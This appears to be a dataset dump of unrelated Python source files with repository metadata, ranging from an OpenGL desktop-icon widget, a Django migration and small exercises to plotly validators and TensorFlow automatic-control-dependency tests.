#glPixelStorei(GL_UNPACK_SKIP_PIXELS, 0)
#glPixelStorei(GL_UNPACK_ROW_LENGTH, 0)
glEnable(GL_TEXTURE_2D)
glActiveTextureARB(GL_TEXTURE0_ARB)
        ww = self.pixbuf2.get_width(); hh = self.pixbuf2.get_height()
#print ww, hh
glTexImage2D(GL_TEXTURE_2D, 0, 3, ww, hh, 0, GL_RGBA,
GL_UNSIGNED_BYTE, self.pixbuf2.get_pixels() )
glLoadName(self.myname)
#glPassThrough(self.myname)
glBegin(GL_QUADS)
# Bottom Left
glMultiTexCoord2fARB(GL_TEXTURE0_ARB, 0.0, 1.0)
glVertex3f(-siz, -siz, .0)
# Bottom Right
glMultiTexCoord2fARB(GL_TEXTURE0_ARB, 1.0, 1.0)
glVertex3f( siz, -siz, .0)
# Top Right
glMultiTexCoord2fARB(GL_TEXTURE0_ARB, 1.0, 0.0)
glVertex3f( siz, siz, .0)
# Top Left
glMultiTexCoord2fARB(GL_TEXTURE0_ARB, 0.0, 0.0)
glVertex3f(-siz, siz, .0)
glEnd()
glDisable(GL_TEXTURE_2D)
# Focus
if self.focus:
#print "focus"
mat_ambient = [ 0.6, 0.6, 0.6, 1.0 ]
glMaterialfv (GL_FRONT, GL_AMBIENT, mat_ambient)
glBegin(GL_QUADS)
x1 = -siz; x2 = siz
y1 = siz; y2 = -siz
linegap = 0.01; depth = 0.01
yf = y1 + linegap
glVertex3f(x1, y1, 0 - depth)
glVertex3f(x2, y1, 0 - depth)
glVertex3f(x2, yf, 0 - depth)
glVertex3f(x1, yf, 0 - depth)
yf = y2 - linegap
glVertex3f(x1, y2, 0 - depth)
glVertex3f(x2, y2, 0 - depth)
glVertex3f(x2, yf, 0 - depth)
glVertex3f(x1, yf, 0 - depth)
xf = x1 - linegap
glVertex3f(xf, y1, 0 - depth)
glVertex3f(x1, y1, 0 - depth)
glVertex3f(x1, y2, 0 - depth)
glVertex3f(xf, y2, 0 - depth)
xf = x2 + linegap
glVertex3f(xf, y1, 0 - depth)
glVertex3f(x2, y1, 0 - depth)
glVertex3f(x2, y2, 0 - depth)
glVertex3f(xf, y2, 0 - depth)
glEnd()
glPopMatrix ()
def do_exec(self):
print "Exec", self.txt
try:
ret = subprocess.Popen([self.command,])
except:
print"\n Cannot launch ", self.command
a,b,c = sys.exc_info()
print sys.excepthook(a,b,c)
def motion(self, event):
#print "fileicon motion", event
pass
def button(self, res, event):
if self.myname in res.names:
got = True
else:
got = False
if event.type == gtk.gdk.BUTTON_PRESS:
if got:
self.focus = True
else:
self.focus = False
if event.type == gtk.gdk._2BUTTON_PRESS:
if got:
self.do_exec()
| [
"[email protected]"
] | |
5244b3066e5f11804f7748f54801fe61074231b7 | b518fdfe5e0d26c384ae4d7770a1c16134640462 | /lms/migrations/0020_auto_20200820_1703.py | 2bce2e6daab456377d80864d6755f354b775400d | [] | no_license | ravichandra99/forlms | 70c43fa8e6e4475b7b18c247e490fc3d4dcb86a1 | ea43cdef75e2984b0a093ad6a0143ef730bfbab5 | refs/heads/master | 2022-12-05T23:03:54.909261 | 2020-08-24T06:21:28 | 2020-08-24T06:21:28 | 289,515,731 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 571 | py | # Generated by Django 3.0.8 on 2020-08-20 11:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('lms', '0019_auto_20200820_1702'),
]
operations = [
migrations.AlterField(
model_name='course',
name='faq',
field=models.ManyToManyField(blank=True, to='lms.FAQ'),
),
migrations.AlterField(
model_name='course',
name='project',
field=models.ManyToManyField(blank=True, to='lms.Project'),
),
]
| [
"[email protected]"
] | |
963c3c937ebbc170044186ef1b7d0d69c25594e3 | 30ac8484a6318a14c1a18994506b476522a8518f | /recipe_modules/futures/__init__.py | bde85606e48b93f60291bc6ae6239efcca9a8680 | [
"Apache-2.0"
] | permissive | Quantum-Platinum-Cloud/recipes-py | 69ee248035c4bf582088d064f1acefbf2ecedaf0 | b60bb0d221df01a41a175daf18632ec0525f20f1 | refs/heads/main | 2023-05-30T13:45:07.673046 | 2023-05-25T19:06:27 | 2023-05-25T19:06:27 | 646,251,290 | 1 | 0 | null | 2023-05-27T19:17:34 | 2023-05-27T19:17:33 | null | UTF-8 | Python | false | false | 162 | py | # Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
| [
"[email protected]"
] | |
87c28f9695b7880bf6642fae0143c7b660d07d56 | a5e5d39f42f468d35f18aab3e78c3c090046b0df | /apps/countdown_letters/utils.py | 34d0cb8777eb356f5c90822ce23bf70b8317f8e0 | [] | no_license | WayneLambert/portfolio | 66198dfc18b3f254e6bc726575903c3e8f570dc4 | 7e02165386e4784f81e15bae0325a77cf45f410d | refs/heads/main | 2023-02-04T18:08:13.559223 | 2023-01-29T14:13:59 | 2023-01-29T14:13:59 | 180,239,669 | 5 | 1 | null | 2023-02-04T07:07:10 | 2019-04-08T22:02:22 | JavaScript | UTF-8 | Python | false | false | 1,860 | py | from urllib.parse import urlencode
from django.urls import reverse
from apps.countdown_letters import logic
from apps.countdown_letters.models import LettersGame
def build_game_screen_url(num_vowels_selected: int) -> str:
"""
Builds the game screen's URL based upon the game's logic for
choosing the letters for the game.
"""
letters_chosen = logic.get_letters_chosen(num_vowels=num_vowels_selected)
base_url = reverse('countdown_letters:game')
letters_chosen_url = urlencode({'letters_chosen': letters_chosen})
return f"{base_url}?{letters_chosen_url}"
def build_results_screen_url(letters_chosen: str, players_word: str) -> str:
"""
Builds the results screen's URL based upon the game's chosen letters
and the player's selected word.
"""
base_url = reverse('countdown_letters:results')
letters_chosen_url = urlencode({'letters_chosen': letters_chosen})
players_word_url = urlencode({'players_word': players_word})
return f"{base_url}?{letters_chosen_url}&{players_word_url}"
def create_record(context: dict):
"""
Following context dictionary validations within the view process,
posts the results to the database for reference and later retrieval.
"""
LettersGame.objects.create(
letters_chosen=context['letters_chosen'],
players_word=context['players_word'],
comp_word=context['comp_word'],
eligible_answer=context['eligible_answer'],
winning_word=context['winning_word'],
player_word_len=context['player_word_len'],
comp_word_len=context['comp_word_len'],
player_score=context['player_score'],
comp_score=context['comp_score'],
definition=context['definition_data']['definition'],
word_class=context['definition_data']['word_class'],
result=context['result'],
)
| [
"[email protected]"
] | |
d3c3b2c4176952ecea3c6ff9256d43ff609b77e2 | 3ab494cac87a9f3c5ba17c903ffdbba7e72c305f | /algorithm/보충/venv/Scripts/easy_install-3.6-script.py | 3eb42c94cecd12c6de91863c2165be01675d4f1b | [] | no_license | sochic2/TIL | 6036cae002ce4c4ba5e7d2175e668c664de209de | eb2709f5ac1a4b9c79dda0e647f14044c7a4fb6e | refs/heads/master | 2023-01-10T03:51:14.057387 | 2022-12-21T01:27:38 | 2022-12-21T01:27:38 | 162,229,719 | 4 | 1 | null | 2023-01-09T11:56:04 | 2018-12-18T04:23:54 | Python | WINDOWS-1256 | Python | false | false | 476 | py | #!C:\Users\student\Desktop\namki\TIL\algorithm\보충\venv\Scripts\python.exe -x
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.6'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.6')()
)
| [
"[email protected]"
] | |
f3bdb90d97b79633bf441562fe7407603ed74a15 | 3f1afc627ac4ba3b870cefd95b307e2194f3c377 | /Gabarito/Exercícios/Lista02/questao04.py | 4b57503465ad7968d3e8353e29a5897318e69dd7 | [] | no_license | valeriacavalcanti/IP-2019.2 | 5e800430131c80979aadbc3481f0bcb07c08921f | 8d796bea2a4892f38c5278069233f5bbb00d4510 | refs/heads/master | 2020-08-06T22:24:34.416129 | 2019-12-11T15:02:44 | 2019-12-11T15:02:44 | 213,180,406 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 134 | py | n1 = 0
n2 = 1
qtde = int(input('Quantity: '))
for i in range(qtde):
    print(n1, end=' ')
    n1, n2 = n2, n1 + n2
print() | [
"[email protected]"
] | |
12a2f8fa71fdc51df7e8e9b65d16e8c5fbee75ca | 7ec91f8b8342b1ab62d315424f43588a13dda307 | /solu/225. Implement Stack using Queues.py | 2408835fcf98d461605bfbc7acf78815f82dad2a | [] | no_license | coolmich/py-leetcode | bbd001a1cb41b13cd0515d1b764ec327dfaaa03c | 3129438b032d3aeb87c6ac5c4733df0ebc1272ba | refs/heads/master | 2020-05-21T08:44:46.564419 | 2016-09-15T15:45:08 | 2016-09-15T15:45:08 | 60,917,444 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 741 | py | from collections import deque
class Stack(object):
def __init__(self):
"""
initialize your data structure here.
"""
self.q = deque([])
self.sz = 0
def push(self, x):
"""
:type x: int
:rtype: nothing
"""
self.q.append(x)
self.sz += 1
n = self.sz
while n > 1:
self.q.append(self.q.popleft())
n -= 1
def pop(self):
"""
:rtype: nothing
"""
self.sz -= 1
self.q.popleft()
def top(self):
"""
:rtype: int
"""
return self.q[0]
def empty(self):
"""
:rtype: bool
"""
return self.sz == 0
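
# --- Added sanity check: illustrative LIFO behaviour of the class above ---
if __name__ == "__main__":
    s = Stack()
    s.push(1)
    s.push(2)
    assert s.top() == 2
    s.pop()
    assert s.top() == 1 and not s.empty()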
| [
"[email protected]"
] | |
fdef99f1e3c57a1ebf30037d68abb0430da91add | 7a09af404f29389504742a3d5f1727bfbe562750 | /TrekBot_WS/build/zed-ros-wrapper/tutorials/zed_tracking_sub_tutorial/catkin_generated/pkg.develspace.context.pc.py | 4a1d4c47aeb7e2baacd1ef341fc620353217ace4 | [
"MIT"
] | permissive | Rafcin/TrekBot | 4baa2ed93b90920b36adba0b72384ac320d2de01 | d3dc63e6c16a040b16170f143556ef358018b7da | refs/heads/master | 2020-03-30T02:15:35.361254 | 2018-12-14T03:30:25 | 2018-12-14T03:30:25 | 150,622,252 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "zed_tracking_sub_tutorial"
PROJECT_SPACE_DIR = "/xavier_ssd/TrekBot/TrekBot_WS/devel"
PROJECT_VERSION = "2.6.0"
| [
"[email protected]"
] | |
b8e63a9fbc5a3b0416566a73132e8279c3cc3cd3 | 010279e2ba272d09e9d2c4e903722e5faba2cf7a | /contrib/python/plotly/py2/plotly/validators/contourcarpet/contours/labelfont/__init__.py | c81c9ce64d4004929b30ba1d1131b7bc3d944506 | [
"MIT",
"Apache-2.0"
] | permissive | catboost/catboost | 854c1a1f439a96f1ae6b48e16644be20aa04dba2 | f5042e35b945aded77b23470ead62d7eacefde92 | refs/heads/master | 2023-09-01T12:14:14.174108 | 2023-09-01T10:01:01 | 2023-09-01T10:22:12 | 97,556,265 | 8,012 | 1,425 | Apache-2.0 | 2023-09-11T03:32:32 | 2017-07-18T05:29:04 | Python | UTF-8 | Python | false | false | 1,637 | py | import _plotly_utils.basevalidators
class SizeValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self,
plotly_name="size",
parent_name="contourcarpet.contours.labelfont",
**kwargs
):
super(SizeValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "plot"),
min=kwargs.pop("min", 1),
role=kwargs.pop("role", "style"),
**kwargs
)
import _plotly_utils.basevalidators
class FamilyValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(
self,
plotly_name="family",
parent_name="contourcarpet.contours.labelfont",
**kwargs
):
super(FamilyValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "plot"),
no_blank=kwargs.pop("no_blank", True),
role=kwargs.pop("role", "style"),
strict=kwargs.pop("strict", True),
**kwargs
)
import _plotly_utils.basevalidators
class ColorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self,
plotly_name="color",
parent_name="contourcarpet.contours.labelfont",
**kwargs
):
super(ColorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "style"),
role=kwargs.pop("role", "style"),
**kwargs
)
| [
"[email protected]"
] | |
3ff051a1e0fbccee71a8f6395bf9a393a6840ce8 | a5f31704d64de5ceeab45811b94f43c7b9b3604e | /bullet.py | 33c7318f91337b06fd9345fe594b6a2a298f182a | [] | no_license | Zhaisan/PythonDev | 6788908f85a628bfa5340185b27e44e5fec4b3a4 | 43aca96d9df6b97651fdf16cf7b3e6d193a1c6b9 | refs/heads/master | 2023-05-09T07:19:37.364294 | 2021-05-31T14:43:49 | 2021-05-31T14:43:49 | 237,256,001 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 714 | py | bullet.py
import pygame
from pygame.sprite import Sprite
class Bullet(Sprite):
def __init__(self, ai_settings, screen, ship):
        """Create a bullet object at the ship's current position."""
super(Bullet, self).__init__()
self.screen = screen
        # Create the bullet at position (0, 0), then set the correct position.
self.rect = pygame.Rect(0, 0, ai_settings.bullet_width,ai_settings.bullet_height)
self.rect.centerx = ship.rect.centerx
self.rect.top = ship.rect.top
self.y = float(self.rect.y)
self.color = ai_settings.bullet_color
self.speed_factor = ai_settings.bullet_speed_factor
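
    # Added completion (assumption): the update/draw methods implied by the
    # attributes above (y, color, speed_factor); modeled on the common
    # "Alien Invasion" bullet class rather than any confirmed original.
    def update(self):
        """Move the bullet up the screen."""
        self.y -= self.speed_factor
        self.rect.y = self.y

    def draw_bullet(self):
        """Draw the bullet to the screen."""
        pygame.draw.rect(self.screen, self.color, self.rect)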
| [
"[email protected]"
] | |
f7392bf4d8322e9dbd1a06a364b5a14d802954af | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-5/b2dac080496d9534c6661a7e47f687373dd8c038-<test_zero_dim>-bug.py | 9c37521a67795f28c566fc1c46c3c2af88c2f14b | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 402 | py | def test_zero_dim(self):
_test_reshape(old_shape=(4, 2, 1), new_shape=(0, 0, 0), expected_shape=(4, 2, 1))
_test_reshape(old_shape=(4, 2, 1), new_shape=(0, 0, 0), expected_shape=(4, 2, 1), arg_shape=False)
_test_reshape(old_shape=(4, 2, 1), new_shape=(0, 2, 1), expected_shape=(4, 2, 1))
_test_reshape(old_shape=(4, 2, 1), new_shape=(0, 2, 1), expected_shape=(4, 2, 1), arg_shape=False) | [
"[email protected]"
] | |
0097e70179f08323f50cb8ac93f084e5942981e7 | 8011631d92166efbf5ecb2c01d02189363a174ec | /subtraction.py | 73fa13df83a5819e234afbd70eeb50f2987319f1 | [] | no_license | tsungic/w19a | e2087311a0730d7b0ea799e2856ddad54f8544d3 | 83ea4d637f9560adeefe3b3617cbf4af4f7803e8 | refs/heads/master | 2023-02-28T20:53:48.523902 | 2021-02-11T05:15:30 | 2021-02-11T05:15:30 | 337,906,871 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33 | py | def subtract(x,y):
return x-y | [
"[email protected]"
] | |
5e6f738c7e99d9a32a44ca6b73d5575c431aab6b | d11c6b6b9762acda60fc094b7e8ad2754fd9b700 | /tensorflow/python/framework/auto_control_deps_test.py | 1cd10964070a486f246f6a84cafb62d9e9d18f7e | [
"MIT",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | jprosser/tensorflow | 28ba58a811ac92e0e15aab518512cd46fbef90ea | c3f73a5f946c63b238f5412717f6aae4d4d6bf4b | refs/heads/master | 2021-10-07T16:53:58.923779 | 2021-10-01T17:23:25 | 2021-10-01T17:28:00 | 219,566,947 | 0 | 1 | Apache-2.0 | 2019-11-04T18:16:54 | 2019-11-04T18:16:53 | null | UTF-8 | Python | false | false | 27,990 | py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import itertools
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import function
from tensorflow.python.framework import auto_control_deps as acd
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import gen_sendrecv_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import adam
from tensorflow.python.training import momentum
class AutomaticControlDependenciesTest(test.TestCase):
def testBasic(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
with acd.AutomaticControlDependencies() as c:
v.assign(v + 1)
v.assign(2 * v)
val = v.read_value()
val = c.mark_as_return(val)
self.assertAllEqual(val, 4.0)
def testNoControlDepsBetweenVariableReads(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
with acd.AutomaticControlDependencies():
read_op1 = gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype).op
read_op2 = gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype).op
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
self.assertNotIn(read_op1, read_op2.control_inputs)
self.assertNotIn(read_op2, read_op1.control_inputs)
def testVariableReadThenWrite(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
with acd.AutomaticControlDependencies():
read_op1 = gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype).op
read_op2 = gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype).op
assign_op = gen_resource_variable_ops.assign_variable_op(
v.handle, v + 1)
# Writes should have control deps from "all" reads since last write
# or start of the code block.
self.assertIn(read_op1, assign_op.control_inputs)
self.assertIn(read_op2, assign_op.control_inputs)
# There should be no control deps between reads.
self.assertNotIn(read_op1, read_op2.control_inputs)
self.assertNotIn(read_op2, read_op1.control_inputs)
def testVariableWriteThenRead(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
with acd.AutomaticControlDependencies():
assign_op = gen_resource_variable_ops.assign_variable_op(
v.handle, v + 1)
read_op1 = gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype).op
read_op2 = gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype).op
# Reads should have a control dep from the last write.
self.assertIn(assign_op, read_op1.control_inputs)
self.assertIn(assign_op, read_op2.control_inputs)
# There should be no control deps between reads.
self.assertNotIn(read_op1, read_op2.control_inputs)
self.assertNotIn(read_op2, read_op1.control_inputs)
def testVariableReadsInOpsWithMustRun(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
with acd.AutomaticControlDependencies() as c:
read_op = gen_resource_variable_ops.read_variable_op(v.handle,
v.dtype).op
# Read ops get added to control outputs only if they have consumers.
c.mark_as_return(read_op.outputs[0])
self.assertIn(read_op, c.ops_which_must_run)
def testVariableMultipleReadsAndWrites(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
with acd.AutomaticControlDependencies() as c:
# 2 reads -> 2 writes -> 2 reads -> 2 writes.
read_op1 = gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype).op
read_op2 = gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype).op
assign_op1 = gen_resource_variable_ops.assign_variable_op(
v.handle, v + 1)
assign_op2 = gen_resource_variable_ops.assign_variable_op(
v.handle, v + 1)
read_op3 = gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype).op
read_op4 = gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype).op
assign_op3 = gen_resource_variable_ops.assign_variable_op(
v.handle, v + 1)
assign_op4 = gen_resource_variable_ops.assign_variable_op(
v.handle, v + 1)
# Read ops get added to control outputs only if they have consumers.
c.mark_as_return(read_op1.outputs[0])
c.mark_as_return(read_op2.outputs[0])
c.mark_as_return(read_op3.outputs[0])
c.mark_as_return(read_op4.outputs[0])
# Verify the control edges.
self.assertIn(read_op1, assign_op1.control_inputs)
self.assertIn(read_op2, assign_op1.control_inputs)
self.assertIn(assign_op1, assign_op2.control_inputs)
self.assertIn(assign_op2, read_op3.control_inputs)
self.assertIn(assign_op2, read_op4.control_inputs)
self.assertIn(read_op3, assign_op3.control_inputs)
self.assertIn(read_op4, assign_op3.control_inputs)
self.assertIn(assign_op3, assign_op4.control_inputs)
# There should be no control deps between reads.
read_ops = [read_op1, read_op2, read_op3, read_op4]
for src_op, tgt_op in itertools.product(read_ops, read_ops):
self.assertNotIn(src_op, tgt_op.control_inputs)
# Reads must be in `ops_which_must_run`.
self.assertIn(read_op1, c.ops_which_must_run)
self.assertIn(read_op2, c.ops_which_must_run)
self.assertIn(read_op3, c.ops_which_must_run)
self.assertIn(read_op4, c.ops_which_must_run)
# Last write must be in `ops_which_must_run`.
self.assertIn(assign_op4, c.ops_which_must_run)
def testSendInOpsWithMustRun(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
with acd.AutomaticControlDependencies() as c:
send_op = gen_sendrecv_ops.send(v, "x", "/", 0, "/")
# Send must be in `ops_which_must_run`.
self.assertIn(send_op, c.ops_which_must_run)
def _testVariableReadInFunctionalOp(self, build_functional_op, op_type):
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
@def_function.function
def read_var_in_while():
gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype, name="read1")
result = build_functional_op(v)
gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype, name="read2")
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
return result
func_graph = read_var_in_while.get_concrete_function().graph
assert len(func_graph.inputs) == 1
def get_op(op_type, sub_name):
operations = [
op for op in func_graph.get_operations()
if op.type == op_type and sub_name in op.name
]
assert len(operations) == 1
return operations[0]
read1 = get_op("ReadVariableOp", "read1")
functional_op = get_op(op_type, "")
read2 = get_op("ReadVariableOp", "read2")
assign_op = get_op("AssignVariableOp", "")
    # Since the functional op only has reads, previous reads e.g. read1 do not
# have a control edge to it and next future reads e.g. read2 do not have a
# control edge from it.
self.assertNotIn(read1, functional_op.control_inputs)
self.assertNotIn(functional_op, read2.control_inputs)
self.assertIn(read1, assign_op.control_inputs)
self.assertIn(read2, assign_op.control_inputs)
self.assertIn(functional_op, assign_op.control_inputs)
def testVariableReadInWhileLoop(self):
def build_functional_op(v):
def body(_):
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return control_flow_ops.while_loop(
lambda i: True, body, [0.0], maximum_iterations=1)
self._testVariableReadInFunctionalOp(build_functional_op, "While")
def testVariableReadInCondTrueBranch(self):
def build_functional_op(v):
def then_branch():
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
def else_branch():
return array_ops.zeros([], v.dtype)
return control_flow_ops.cond(
constant_op.constant(True), then_branch, else_branch)
self._testVariableReadInFunctionalOp(build_functional_op, "If")
def testVariableReadInCondFalseBranch(self):
def build_functional_op(v):
def then_branch():
return array_ops.zeros([], v.dtype)
def else_branch():
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return control_flow_ops.cond(
constant_op.constant(False), then_branch, else_branch)
self._testVariableReadInFunctionalOp(build_functional_op, "If")
def testVariableReadInCaseBranch0(self):
def build_functional_op(v):
def branch0():
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
def branch1():
return array_ops.zeros([], v.dtype)
return control_flow_ops.switch_case(
constant_op.constant(0), [branch0, branch1])
self._testVariableReadInFunctionalOp(build_functional_op, "Case")
def testVariableReadInCaseBranch1(self):
def build_functional_op(v):
def branch0():
return array_ops.zeros([], v.dtype)
def branch1():
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return control_flow_ops.switch_case(
constant_op.constant(0), [branch0, branch1])
self._testVariableReadInFunctionalOp(build_functional_op, "Case")
def testVariableReadInFunction(self):
def build_functional_op(v):
@def_function.function
def fn_with_read():
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return fn_with_read()
self._testVariableReadInFunctionalOp(build_functional_op,
"StatefulPartitionedCall")
def testVariableReadInNestedFunction(self):
def build_functional_op(v):
@def_function.function
def fn_with_read():
@def_function.function
def inner_fn():
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return inner_fn()
return fn_with_read()
self._testVariableReadInFunctionalOp(build_functional_op,
"StatefulPartitionedCall")
def testVariableReadInWhileInInnerFunc(self):
def build_functional_op(v):
@def_function.function
def fn_with_read():
@def_function.function
def inner_fn():
def body(_):
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return control_flow_ops.while_loop(
lambda i: True, body, [0.0], maximum_iterations=1)
return inner_fn()
return fn_with_read()
self._testVariableReadInFunctionalOp(build_functional_op,
"StatefulPartitionedCall")
def testVariableReadInCondInInnerFunc(self):
def build_functional_op(v):
@def_function.function
def fn_with_read():
@def_function.function
def inner_fn():
def then_branch():
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
def else_branch():
return array_ops.zeros([], v.dtype)
return control_flow_ops.cond(
constant_op.constant(True), then_branch, else_branch)
return inner_fn()
return fn_with_read()
self._testVariableReadInFunctionalOp(build_functional_op,
"StatefulPartitionedCall")
def _testVariableWriteInFunctionalOp(self, build_functional_op, op_type):
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
@def_function.function
def write_var_in_while():
gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype, name="read1")
result = build_functional_op(v)
gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype, name="read2")
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
return result
func_graph = write_var_in_while.get_concrete_function().graph
assert len(func_graph.inputs) == 1
def get_op(op_type, sub_name):
operations = [
op for op in func_graph.get_operations()
if op.type == op_type and sub_name in op.name
]
assert len(operations) == 1
return operations[0]
read1 = get_op("ReadVariableOp", "read1")
functional_op = get_op(op_type, "")
read2 = get_op("ReadVariableOp", "read2")
assign_op = get_op("AssignVariableOp", "")
# Since the While has writes, it has control edges from previous reads
# e.g. `read1` and to future reads(`read2`) and writes(`assign_op`).
self.assertIn(read1, functional_op.control_inputs)
self.assertIn(functional_op, read2.control_inputs)
self.assertIn(read2, assign_op.control_inputs)
self.assertIn(functional_op, assign_op.control_inputs)
def testVariableWriteInWhileLoop(self):
def build_functional_op(v):
def body(_):
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return control_flow_ops.while_loop(
lambda i: True, body, [0.0], maximum_iterations=1)
self._testVariableWriteInFunctionalOp(build_functional_op, "While")
def testVariableWriteInCondTrueBranch(self):
def build_functional_op(v):
def then_branch():
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
def else_branch():
return array_ops.zeros([], v.dtype)
return control_flow_ops.cond(
constant_op.constant(True), then_branch, else_branch)
self._testVariableWriteInFunctionalOp(build_functional_op, "If")
def testVariableWriteInCondFalseBranch(self):
def build_functional_op(v):
def then_branch():
return array_ops.zeros([], v.dtype)
def else_branch():
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return control_flow_ops.cond(
constant_op.constant(False), then_branch, else_branch)
self._testVariableWriteInFunctionalOp(build_functional_op, "If")
def testVariableWriteInCaseBranch0(self):
def build_functional_op(v):
def branch0():
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
def branch1():
return array_ops.zeros([], v.dtype)
return control_flow_ops.switch_case(
constant_op.constant(0), [branch0, branch1])
self._testVariableWriteInFunctionalOp(build_functional_op, "Case")
def testVariableWriteInCaseBranch1(self):
def build_functional_op(v):
def branch0():
return array_ops.zeros([], v.dtype)
def branch1():
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return control_flow_ops.switch_case(
constant_op.constant(0), [branch0, branch1])
self._testVariableWriteInFunctionalOp(build_functional_op, "Case")
def testVariableWriteInFunction(self):
def build_functional_op(v):
@def_function.function
def fn_with_write():
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return fn_with_write()
self._testVariableWriteInFunctionalOp(build_functional_op,
"StatefulPartitionedCall")
